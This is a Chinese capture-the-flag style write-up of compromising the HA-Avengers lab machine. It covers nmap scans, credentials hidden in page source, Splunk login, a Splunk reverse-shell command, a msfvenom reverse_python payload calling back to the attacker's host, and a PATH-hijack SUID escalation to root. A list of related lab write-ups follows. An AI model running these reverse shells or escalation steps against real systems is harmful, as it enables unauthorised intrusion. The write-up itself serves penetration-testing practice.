HA-Avengers靶机渗透

简介: HA-Avengers靶机渗透

0x01 确定靶机即开放端口信息


攻击机ip:192.168.19.174


靶机ip:不知道,与攻击机都在NAT模式


a.扫描网段,确定靶机ip


nmap -sP 192.168.19.0/24



因为提前知道了攻击机的ip为192.168.19.174,在同一局域网我们便确定了靶机的ip为192.168.19.175


b.扫描靶机开放的端口



nmap -A 192.168.19.175



根据扫描的结果,我们知道靶机开放了80,8000等端口,还开放了/groot的目录。


0x02 访问web界面,进行web渗透


92faa925fffa408a81b03c2b1134d66a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


在web界面中,并没有得到什么有用的信息,根据平时渗透的经验,一些信息可能被注释在源码中。所以我们从源码开始下手。


在源码中,我们看到了几个超链接,在一个超链接中,我们发现了如下信息:


b713423a4c8cc4f58fc4446b189ec3a1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


尝试用base64,unicode等解密方法解密,尝试16进制解密后发现了如下类似于账号和密码的信息:


agent:avengers


有可能是靶机的账号加上密码,所以下一步我们尝试用ssh进行登录:


7707396291fb249810676cc1588c1e60_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


但是ssh登录失败,所以这不是系统用户,可能是某一个插件的账号


0x03 访问8000端口,继续收集信息


在拿到一个类似于账号加密码的信息之后,发现利用ssh登录失败,回到最初扫描得到的信息中,访问8000端口。访问之后,我们发现了系统安装了Splunk,进入到Splunk的主界面上,有一个用户登录的信息,尝试用刚刚拿到的信息进行登录。


利用刚才得到的账号加密码,我们成功地登陆了Splunk的后台



从网上搜了一下Splunk的使用方法之后,我们可以上传一个shell的gz包




| revshell std 192.168.19.175 1234


上传shell的gz包后,我们利用命令触发shell反弹



b4dd004618bd005edacc1da3783a7249_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


拿到一个普通用户的权限之后,接下来的任务就是提权了


0x04 提权


a.获得交互式shell


可以使用msfvenom命令生成一个python的交互式命令



msfvenom -p cmd/unix/reverse_python lhost=192.168.19.174 lport=4444 R


执行成功后,会生成一个关于python的base64代码

375b9b84f07344df2ad42d55dae9584b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


我们将生成的python payload直接在刚刚已经获得的普通用户的shell上直接运行,在kali端进行端口的监听,这样在获得一个shell之后,我们就可以用python的交互式命令得到一个交互式的shell


231c7c10ef759d5a1eb4468695d41e1c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


b.内核提权


f782c61a46754156f3193a8794104c2c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


在这里我们查到的信息为:系统版本为18.04,内核版本为4.18,在kali上找一下相关的exp,没有找到相关的exp。


c.SUID提权


首先查找系统内的SUID可执行文件



find / -perm -u=s -type f 2>/dev/null


c9ba9bdaef502b7e24f22c911be09ec6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


在查找文件的时候,发现了这样一个文件/opt/ignite,尝试一下从这个文件下手。

找了一下相关suid提权的相关思路,利用suid提权,成功拿到了root的权限


cd /tmp
echo "/bin/bash" > ifconfig
chmod 777 ifconfig
export PATH=/tmp:$PATH
/opt/ignite
cd /root

05fa2f6579e6418eda8158ba3184ada3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


相关文章
|
6月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
261 0
|
1月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
1月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
36 4
|
安全 Linux 网络安全
使用D盾扫描Linux主机Webshell
使用D盾扫描Linux主机Webshell
443 0
使用D盾扫描Linux主机Webshell
|
6月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
125 0
|
6月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
227 0
|
6月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
71 0
|
6月前
|
监控 Linux 网络安全
百度搜索:蓝易云【CentOS7如何使用fail2ban防范SSH暴力破解攻击?】
请注意,fail2ban还有其他功能和配置选项可供使用,您可以进一步定制以满足您的需求。您可以查阅fail2ban的官方文档或其他资源以了解更多详细信息和配置选项。
76 1
|
11月前
|
前端开发 Docker 容器
基于xinetd部署pwn题(百分百搭成并且可以nc靶场地址)
基于xinetd部署pwn题(百分百搭成并且可以nc靶场地址)
277 1
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
106 2
Vulnhub靶机DC-1渗透笔记